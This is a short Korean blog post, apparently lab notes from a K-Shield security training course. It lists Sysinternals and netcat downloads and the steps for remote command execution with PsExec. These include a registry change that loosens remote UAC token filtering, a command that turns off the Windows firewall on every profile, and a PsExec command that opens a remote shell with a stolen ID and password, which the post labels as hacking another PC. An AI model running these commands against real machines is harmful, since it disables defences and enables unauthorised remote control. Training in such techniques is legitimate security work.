2022. 7. 21. 15:23ㆍ활동,공부(IT)/케이쉴드
https://docs.microsoft.com/en-us/sysinternals/downloads/
Sysinternals Utilities - Windows Sysinternals
Evaluate and find out how to install, deploy, and maintain Windows with Sysinternals utilities.
docs.microsoft.com
> SysinternalsSuite 다운
Sysinternals Utilities - Windows Sysinternals
Evaluate and find out how to install, deploy, and maintain Windows with Sysinternals utilities.
docs.microsoft.com
https://packetstormsecurity.com/files/download/12621/nc11nt.zip
Download: nc11nt.zip ≈ Packet Storm
© 2022 Packet Storm. All rights reserved.
packetstormsecurity.com
netcat 다운
SysinternalsSuite 받은 위치 관리자 권한으로 cmd 실행후 이동
https://stackoverflow.com/questions/828432/psexec-access-denied-errors
PSEXEC, access denied errors
While I'm using PSEXEC.exe getting 'Access denied' error for remote systems. Any idea about how to solve this?
stackoverflow.com
다음과 같이 진행
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
netsh advfirewall set allprofiles state off
id와 pw 전달
공격자가
psexec -i \\ip -u id -p pass cmd
>>
상대방 pc 해킹하는 방법!!!
원격으로
'활동,공부(IT) > 케이쉴드' 카테고리의 다른 글
5일차 공통 교육 과정(윈도우) (0) | 2022.07.23 |
---|---|
오프라인 8일차 (위협에 대응하기 위한 보안 환경의 이해) (0) | 2022.07.21 |
오프라인 7일차 (웨협에 대응하기 위한 보안 환경의 이해) (0) | 2022.07.18 |
오프라인 6일차 (ssrf) (0) | 2022.07.16 |
오프라인 5일차 (웹 서비스 기반 주요 위협) (0) | 2022.07.11 |